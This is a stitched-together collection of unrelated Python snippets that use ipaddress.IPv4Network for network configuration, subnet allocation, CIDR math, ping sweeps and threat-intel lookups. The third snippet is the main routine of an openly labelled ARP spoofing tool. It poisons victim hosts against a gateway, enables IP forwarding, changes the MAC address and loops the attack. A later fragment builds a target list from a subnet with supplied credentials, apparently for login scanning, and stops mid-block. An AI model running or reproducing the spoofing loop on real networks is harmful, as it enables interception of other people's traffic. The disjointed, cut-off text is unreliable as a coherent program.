def _get_nic_info(self, cfgFile, intfcDict): device = self._getNetworkInterfaceDeviceName(intfcDict) if not device: # Unable to determine device name for network interface, # configuration may be bogus. self.getLogger().warning( 'Unable to determine device name for [%s]' % (cfgFile)) return None ip = netmask = network = None devDict = self._getNetworkManagerDevice(device) if not devDict: if 'IPADDR' in intfcDict: ip = intfcDict['IPADDR'] else: ip, netmask = self._get_interface_ip_address(device) if 'NETMASK' in intfcDict: netmask = intfcDict['NETMASK'] else: # Create netmask from PREFIX if 'PREFIX' in intfcDict: # Convert the prefix (ie /24) to a netmask netmask = ipaddress.IPv4Network( '%s/%s' % (ip, intfcDict['PREFIX'])).netmask else: netmask = self._get_netmask_by_network_class(ip) else: # Use results obtained from NetworkManager if 'IP4-SETTINGS.ADDRESS' in devDict: ip = devDict['IP4-SETTINGS.ADDRESS'] if 'IP4-SETTINGS.PREFIX' in devDict: vals = devDict['IP4-SETTINGS.PREFIX'].split(' ') netmask = vals[1][1:-1] if ip and netmask: network = str( ipaddress.IPv4Network(u('%s/%s' % (ip, netmask))).network) mac = self._getNetworkInterfaceMacAddress(device, intfcDict) if not mac and 'GENERAL.HWADDR' in devDict: mac = devDict['GENERAL.HWADDR'] bootproto = self._getNetworkInterfaceBootproto(intfcDict) dhcp = (bootproto.lower() == 'dhcp') enabled = self._getNetworkInterfaceOnBoot(intfcDict) return { 'device': device, 'ip': ip, 'netmask': netmask, 'network': network, 'mac': mac, 'dhcp': dhcp, 'boot': True, 'provision': False, 'enabled': enabled, 'cfgfile': cfgFile, }
def _network(left, right): 'Helper for match_spec.' return ipaddress.IPv4Address(left) in ipaddress.IPv4Network(right)
def main(): parser = argparse.ArgumentParser(description="ARP spoof script") parser.print_help = print_help parser.add_argument("-t", "--targets", help="Victim IP Address to ARP poison", required=True) parser.add_argument( "-g", "--gateway", help="the host you wish to intercept packets for (usually the gateway)", required=True) parser.add_argument("-i", "--interface", help="Specify an interface", required=True) parser.add_argument("-a", "--arp", help="Scan With ARP instead of nmap scan", action='store_true', required=False) args = parser.parse_args() targets, gateway, iface, __arp = args.targets, args.gateway, args.interface, args.arp global interface_mac interface_mac = get_if_hwaddr(iface) log.info(f"Started at {t()}") if '/' in targets: if not __arp: p = log.progress( f"Scanning {CYAN}network{RESET} for {GREEN}connected{RESET} devices" ) up, down, List, targets = NmapConnectedDevices(targets, p) _displayWithNmap(up, down, List) else: targets = ipaddress.IPv4Network(targets) targets = [str(target) for target in targets.hosts()] p = log.progress( f"Scanning {CYAN}network{RESET} for {GREEN}connected{RESET} devices" ) d_v, targets = XGetConnectedDevices(targets, p) displayFounded(d_v) else: targets = targets.split(",") if gateway in targets: targets.remove(gateway) if getLocalIp() in targets: targets.remove(getLocalIp()) if len(targets) == 0: log.failure( f'no {GREEN}clients{RESET} detected in this {WHITE}network.{RESET}' ) log.warn( f'if you think this is an {YELLOW}error{RESET}, please specify your {GREEN}targets.{RESET}' ) log.failure('exiting...') exit(0) p = log.progress("Enabling IP Routing") time.sleep(0.5) enable_ip_route(p) try: p = log.progress('Generating mac address') change_mac(iface, p) v_t = f'{RESET},{GREEN} '.join(targets) log.success( f"Starting {CYAN}attack{RESET} on {GREEN}{len(targets)}{RESET} valid targets → '{GREEN}{v_t}{RESET}'." ) while True: with concurrent.futures.ThreadPoolExecutor( max_workers=len(targets)) as executor: { executor.submit(XSpoofed, str(target), gateway): target for target in targets } except KeyboardInterrupt: log.warning( f"{RED}Detected{YELLOW} CTRL+C ! {RESET}restoring the network, please wait...\n" ) with concurrent.futures.ThreadPoolExecutor( max_workers=len(targets)) as executor: { executor.submit(XRestored, str(target), gateway): target for target in targets } p = log.progress( f"Restoring {WHITE}{iface} {GREEN}→ {WHITE}{interface_mac}{RESET} mac address" ) change_mac(iface, p, mac=interface_mac) except OSError as err: change_mac(iface, p, mac=interface_mac) exit(log.failure(str(err)))
#!/usr/bin/env python3 import sys import ipaddress if len(sys.argv) < 2: print('Provide an IP address in CIDR format eg. 192.0.2.0/26') print( 'See: https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing for more details' ) cidr = sys.argv[1] iprange = ([str(ip) for ip in ipaddress.IPv4Network(cidr, strict=False)]) ipn = ipaddress.ip_network(cidr, strict=False) print("%-20s: %s" % ("Start", iprange[0])) print("%-20s: %s" % ("End", iprange[-1])) print("%-20s: %s" % ("Num address", ipn.num_addresses)) print("%-20s: %s" % ("Netmask", ipn.netmask))
def get_next_network(self, prefix_length, num=None, strict=False, as_objects=True): """ Return a list of the next available networks. If no networks are available, an empty list will be returned. :param prefix_length: The prefix length of networks :param num: The number of networks desired :param as_objects: Whether to return IPNetwork objects or strings :param strict: Whether to return networks for strict allocation :returns: list(IPNetwork) """ start_time = time.time() # For debugging # If we're reserved, automatically ZILCH!! # TODO(jathan): Should we raise an error instead? if self.state == Network.RESERVED: return [] try: prefix_length = int(prefix_length) except (TypeError, ValueError) as err: raise exc.ValidationError({'prefix_length': err.message}) if prefix_length < self.prefix_length: raise exc.ValidationError({ 'prefix_length': 'New prefix must be longer than %r' % self.prefix_length }) # Default to 1. if num is None or num < 1: num = 1 try: num = int(num) except ValueError as err: raise exc.ValidationError({'num': err.message}) cidr = self.ip_network if prefix_length > cidr.max_prefixlen: try: next(cidr.subnets(new_prefix=prefix_length)) except ValueError as err: raise exc.ValidationError({'prefix_length': err.message}) if strict: children = [c.ip_network for c in self.get_children()] else: children = [ c.ip_network for c in self.get_descendants() if (c.prefix_length >= prefix_length) ] exclude_nums = {} network_prefix = cidr.network_address # Get integer value of network address of parent network shifted # (cidr.max_prefixlen - prefix_length) bits to the right a = int(network_prefix) >> (cidr.max_prefixlen - prefix_length) for c in children: # For each child get integer value of network address shifted # (cidr.max_prefixlen - prefix_length) bits to the right b = int(c.network_address) >> (cidr.max_prefixlen - prefix_length) # Get xor of parent network address and child network address this # gets rid of the parent network address bits d = a ^ b # Store the child's prefix length in excluded_nums with the # variable d as the key if d in exclude_nums: # If two children share the same key, then store the shortest # prefix length if c.prefixlen < exclude_nums[d]: exclude_nums[d] = c.prefixlen else: exclude_nums[d] = c.prefixlen wanted = [] # Keep a counter starting at integer value of parent network address counter = int(cidr.network_address) # The upper limit is parent network prefix + 1 upper = int( cidr.network_address) + 2**(cidr.max_prefixlen - cidr.prefixlen) while counter < upper: # If we have requested number of networks then we can break if len(wanted) == num: break if cidr.version == 4: next_subnet = ipaddress.IPv4Network((counter, prefix_length)) else: next_subnet = ipaddress.IPv6Network((counter, prefix_length)) # Shift the bits between parent prefix and requested prefix all the # way to the right b = counter >> (cidr.max_prefixlen - prefix_length) # Remove the parent network address part c = a ^ b if c in exclude_nums: # If this sequence of bits were seen before then we must skip # this network p = exclude_nums.pop(c) if p < prefix_length: # If current network is possibly child of another child # then we must skip overlapping child's range of addresses, # this is so we can implement strict allocation counter += 2**(cidr.max_prefixlen - p) else: # Otherwise just skip to next network with requested # prefix_length counter += 2**(cidr.max_prefixlen - prefix_length) continue else: counter += 2**(cidr.max_prefixlen - prefix_length) # If this is an interconnect network, we include first and last # address in subnet if cidr.prefixlen in settings.NETWORK_INTERCONNECT_PREFIXES: pass elif ( prefix_length in settings.HOST_PREFIXES and (next_subnet.network_address == cidr.network_address or next_subnet.broadcast_address == cidr.broadcast_address)): # Otherwise we skip first and last address in subnet continue # Add network to wanted list wanted.append(next_subnet) elapsed_time = time.time() - start_time log.debug('>> WANTED = %s', wanted) log.debug('>> ELAPSED TIME: %s' % elapsed_time) return wanted if as_objects else [unicode(w) for w in wanted]
def getMask(IP): maska = ipaddress.IPv4Network(IP) print(maska) return maska
def ipv4_prefix_str(ipv4_prefix): address = ipv4_prefix.address length = ipv4_prefix.prefixlen return str(ipaddress.IPv4Network((address, length)))
'vl_api_mac_address_t': { 'MACAddress': lambda o: o.packed, 'str': lambda s: macaddress.mac_pton(s) }, } def unformat_api_address_t(o): if o.af == 1: return ipaddress.IPv6Address(o.un.ip6) if o.af == 0: return ipaddress.IPv4Address(o.un.ip4) def unformat_api_prefix_t(o): if isinstance(o.address, ipaddress.IPv4Address): return ipaddress.IPv4Network((o.address, o.address_length), False) if isinstance(o.address, ipaddress.IPv6Address): return ipaddress.IPv6Network((o.address, o.address_length), False) conversion_unpacker_table = { 'vl_api_ip6_address_t': lambda o: ipaddress.IPv6Address(o), 'vl_api_ip6_prefix_t': lambda o: ipaddress.IPv6Network((o.prefix, o.len)), 'vl_api_ip4_address_t': lambda o: ipaddress.IPv4Address(o), 'vl_api_ip4_prefix_t': lambda o: ipaddress.IPv4Network((o.prefix, o.len)), 'vl_api_address_t': lambda o: unformat_api_address_t(o), 'vl_api_prefix_t': lambda o: unformat_api_prefix_t(o), 'vl_api_mac_address_t': lambda o: macaddress.MACAddress(o), }
def create_subnet( self, vpc_id, cidr_block, ipv6_cidr_block=None, availability_zone=None, availability_zone_id=None, tags=None, ): subnet_id = random_subnet_id() vpc = self.get_vpc( vpc_id ) # Validate VPC exists and the supplied CIDR block is a subnet of the VPC's vpc_cidr_blocks = [ ipaddress.IPv4Network(str(cidr_block_association["cidr_block"]), strict=False) for cidr_block_association in vpc.get_cidr_block_association_set() ] try: subnet_cidr_block = ipaddress.IPv4Network(str(cidr_block), strict=False) except ValueError: raise InvalidCIDRBlockParameterError(cidr_block) subnet_in_vpc_cidr_range = False for vpc_cidr_block in vpc_cidr_blocks: if (vpc_cidr_block.network_address <= subnet_cidr_block.network_address and vpc_cidr_block.broadcast_address >= subnet_cidr_block.broadcast_address): subnet_in_vpc_cidr_range = True break if not subnet_in_vpc_cidr_range: raise InvalidSubnetRangeError(cidr_block) # The subnet size must use a /64 prefix length. if ipv6_cidr_block and "::/64" not in ipv6_cidr_block: raise GenericInvalidParameterValueError("ipv6-cidr-block", ipv6_cidr_block) for subnet in self.get_all_subnets(filters={"vpc-id": vpc_id}): if subnet.cidr.overlaps(subnet_cidr_block): raise InvalidSubnetConflictError(cidr_block) # if this is the first subnet for an availability zone, # consider it the default default_for_az = str(availability_zone not in self.subnets).lower() map_public_ip_on_launch = default_for_az if availability_zone is None and not availability_zone_id: availability_zone = "us-east-1a" try: if availability_zone: availability_zone_data = next( zone for zones in RegionsAndZonesBackend.zones.values() for zone in zones if zone.name == availability_zone) elif availability_zone_id: availability_zone_data = next( zone for zones in RegionsAndZonesBackend.zones.values() for zone in zones if zone.zone_id == availability_zone_id) except StopIteration: raise InvalidAvailabilityZoneError( availability_zone, ", ".join([ zone.name for zones in RegionsAndZonesBackend.zones.values() for zone in zones ]), ) subnet = Subnet( self, subnet_id, vpc_id, cidr_block, ipv6_cidr_block, availability_zone_data, default_for_az, map_public_ip_on_launch, assign_ipv6_address_on_creation=False, ) for tag in tags or []: tag_key = tag.get("Key") tag_value = tag.get("Value") subnet.add_tag(tag_key, tag_value) # AWS associates a new subnet with the default Network ACL self.associate_default_network_acl_with_subnet(subnet_id, vpc_id) self.subnets[availability_zone][subnet_id] = subnet return subnet
def unformat_api_prefix_t(o): if isinstance(o.address, ipaddress.IPv4Address): return ipaddress.IPv4Network((o.address, o.address_length), False) if isinstance(o.address, ipaddress.IPv6Address): return ipaddress.IPv6Network((o.address, o.address_length), False)
def __init__(self, name, color, username, password, port, output=sys.stdout, reboot=False, location=None, pre_cmd_host=None, cmd=None, post_cmd_host=None, post_cmd=None, cleanup_cmd=None, env=None, lan_network=ipaddress.IPv4Network(u"192.168.1.0/24"), lan_gateway=ipaddress.IPv4Address(u"192.168.1.1"), config=[]): if name is not None: pexpect.spawn.__init__(self, command="ssh", args=[ '%s@%s' % (username, name), '-p', port, '-o', 'StrictHostKeyChecking=no', '-o', 'UserKnownHostsFile=/dev/null' ]) self.name = name else: name = None if pre_cmd_host is not None: sys.stdout.write("\tRunning pre_cmd_host.... ") sys.stdout.flush() phc = pexpect.spawn(command='bash', args=['-c', pre_cmd_host], env=env) phc.expect(pexpect.EOF, timeout=120) print("\tpre_cmd_host done") if cleanup_cmd is not None: self.cleanup_cmd = cleanup_cmd atexit.register(self.run_cleanup_cmd) pexpect.spawn.__init__(self, command="bash", args=['-c', cmd], env=env) self.color = color self.output = output self.username = username if username != "root": self.prompt.append('%s\\@.*:.*$' % username) self.password = password self.port = port self.location = location self.env = env self.lan_network = lan_network self.lan_gateway = lan_gateway self.config = config # we need to pick a non-conflicting private network here # also we want it to be consistant and not random for a particular # board if (lan_gateway - lan_network.num_addresses).is_private: self.gw = lan_gateway - lan_network.num_addresses else: self.gw = lan_gateway + lan_network.num_addresses self.nw = ipaddress.IPv4Network(str(self.gw).decode('utf-8') + '/' + str(lan_network.netmask), strict=False) # override above values if set in wan options if 'options' in self.config: options = [x.strip() for x in self.config['options'].split(',')] for opt in options: if opt.startswith('wan-static-ip:'): self.gw = opt.replace('wan-static-ip:', '') if opt.startswith('wan-static-route:'): self.static_route = opt.replace('wan-static-route:', '').replace('-', ' via ') if opt.startswith('wan-dhcp-client'): self.wan_dhcp = True if opt.startswith('wan-cmts-provisioner'): self.wan_cmts_provisioner = True if opt.startswith('wan-no-eth0'): self.wan_no_eth0 = True try: i = self.expect(["yes/no", "assword:", "Last login"] + self.prompt, timeout=30) except pexpect.TIMEOUT as e: raise Exception("Unable to connect to %s." % name) except pexpect.EOF as e: if hasattr(self, "before"): print(self.before) raise Exception("Unable to connect to %s." % name) if i == 0: self.sendline("yes") i = self.expect(["Last login", "assword:"]) if i == 1: self.sendline(password) else: pass # if we did initially get a prompt wait for one here if i < 3: self.expect(self.prompt) if name is None: self.sendline('hostname') self.expect('hostname') self.expect(self.prompt) name = self.name = self.before.strip() if self.port != 22: cprint("%s port %s device console = %s" % (name, port, colored(color, color)), None, attrs=['bold']) else: cprint("%s device console = %s" % (name, colored(color, color)), None, attrs=['bold']) if post_cmd_host is not None: sys.stdout.write("\tRunning post_cmd_host.... ") sys.stdout.flush() phc = pexpect.spawn(command='bash', args=['-c', post_cmd_host], env=env) i = phc.expect([pexpect.EOF, pexpect.TIMEOUT, 'password']) if i > 0: print("\tpost_cmd_host did not complete, it likely failed\n") else: print("\tpost_cmd_host done") if post_cmd is not None: env_prefix = "" for k, v in env.iteritems(): env_prefix += "export %s=%s; " % (k, v) self.sendline(env_prefix + post_cmd) self.expect(self.prompt) if reboot: self.reset() self.logfile_read = output
# res = 0 # elif n == 1 or n == 2: # res = 1 # else: # prev1 = 1 # prev2 = 1 # num = 0 # for _ in range(3, n + 1): # num = prev1 + prev2 # prev2 = prev1 # prev1 = num # res = num # return res # # print(fibonacci(1)) import ipaddress print("hello") cidrSig = '172.10.242.81/12' rangeAddr = ipaddress.IPv4Network(cidrSig, False) leadindBits = int(cidrSig.split("/")[1]) addressCount = pow(2, 32 - leadindBits) print(addressCount) print(str(rangeAddr[0])) print(rangeAddr[-1]) # for addr in rangeAddr: # print(rangeAddr) # rangeAddr = [str(ip) for ip in ipaddress.IPv4Network('192.0.2.0/28',False)] # print(len(rangeAddr)) # print(rangeAddr[0]) # print(rangeAddr[-1])
#!/bin/python3 import os import ipaddress total = -1 online = 0 listaIPs = [] for host in ipaddress.IPv4Network('192.168.10.0/24'): resposta = os.system("ping -c 1 " + str(host) + " > /dev/null 2>&1") if resposta == 0: print(str(host) + " está online") online = online + 1 total = total + 1 else: print(str(host) + " está offline") total = total + 1 if total < 51: listaIPs.append(str(host)) print(listaIPs)
print (''' Per the Umbrella Investigate API, the status will be one of the following "-1" if the domain is believed to be malicious, "1" if the domain is believed to be benign, "0" if it hasn't been classified yet ''') response_body = response.json()["data"]["website"][8:] print (f'ASN {bad_asn} appears to be associated with {response_body}') response = requests.get('https://investigate.api.umbrella.com/domains/score/' + response_body, headers=headers) reply_body = response.json()[response_body] print (f'{response_body} shows a Score of ' + reply_body) while True: try: bad_subnet = input ('Please enter the offending IPv4 subnet: ') verifyip = ipaddress.IPv4Network(bad_subnet) if verifyip.prefixlen <= 24 and verifyip.is_global: break except Exception as e: print(e) bad_asn = get_as(bad_subnet) print () print (f'The ASN this subnet originates is found to be: {bad_asn}') all_the_prefixes = get_prefixes_per_asn(str(bad_asn)) print () print ('The other IPv4 prefixes associated with this ASN are:') print (*all_the_prefixes, sep = '\n') print () further_investigation = input('Do you want to use Umbrella Investigate API to try and find the Domain status? ') if further_investigation.lower() == 'y': umbrella_investigate(str(bad_asn), headers)
if __name__ == '__main__': # Parameters check if len(sys.argv) < 2 or len(sys.argv) > 4: print("{} <ip|subnet|filename> [username] [password]".format( sys.argv[0])) sys.exit(1) if len(sys.argv) > 2: USERNAME = sys.argv[2] if len(sys.argv) > 3: PASSWORD = sys.argv[3] ok = False targets = sys.argv[1] tgtlist = [] try: netw = ipaddress.IPv4Network(unicode(targets)) for ip in netw: tgtlist.append(ip) ok = True except: pass if not ok: try: netlist = open(targets, 'r').read().splitlines() for net in netlist: net = net.replace("\n", "").replace("\r", "") netw = ipaddress.IPv4Network(unicode(net)) for ip in netw: tgtlist.append(ip) ok = True except:
def main(): start_date = date(2019,6,5) end_date = date(2020,2,26) edrop_route = {} edrop_counter = 0 weird_counter = 0 diff_time = 0 diff_amount = 0 diff_weird_counter = 0 occurred = set() with open("edroplist_data.pickle", "rb") as f: edrop_data = pickle.load(f) ip_list = [x for x in edrop_data if x[-3] == '/'] ip_list = ip_list[:len(ip_list)//2] for p_date in daterange(start_date,end_date): day = p_date.strftime('%d') month = p_date.strftime('%m') year = p_date.strftime('%Y') date_str = p_date.strftime('%Y-%m-%d') try: tree = buildTree(year,month,day) except OSError as e: print(e) print('failed to access date %s'%date_str) print('Make sure the date is valid') continue print(date_str) for x in ip_list: counter = 0 if x not in occurred: for u_ip in random.sample(list(ipaddress.IPv4Network(unicode(x, "utf-8"))),100): ip = str(u_ip) if not tree.check_prefix_is_routable(ip): counter += 1 if counter != 0: if date_str not in edrop_route: edrop_route[date_str] = [x] occurred.add(x) edrop_counter += 1 else: edrop_route[date_str].append(x) occurred.add(x) edrop_counter += 1 date_added = datetime.strptime(edrop_data[x][0],"%Y-%m-%d").date() diff = p_date - date_added if p_date < date_added: # blocked before it is added to bllack list diff_weird_counter += 1 else: diff_time += diff.total_seconds() diff_amount +=1 if counter != 100: weird_counter += 1 f1 = open( "edroproute_1.pickle", "wb" ) pickle.dump( edrop_route, f1) f1.close() avg_day = diff_time/86400/diff_amount print("edrop_part1") print("edrop_counter: " + str(edrop_counter)) print(edrop_route) print("weird_counter " + str(weird_counter)) print("avg_hour " + str(avg_day)) print("diff_weird_counter " + str(diff_weird_counter))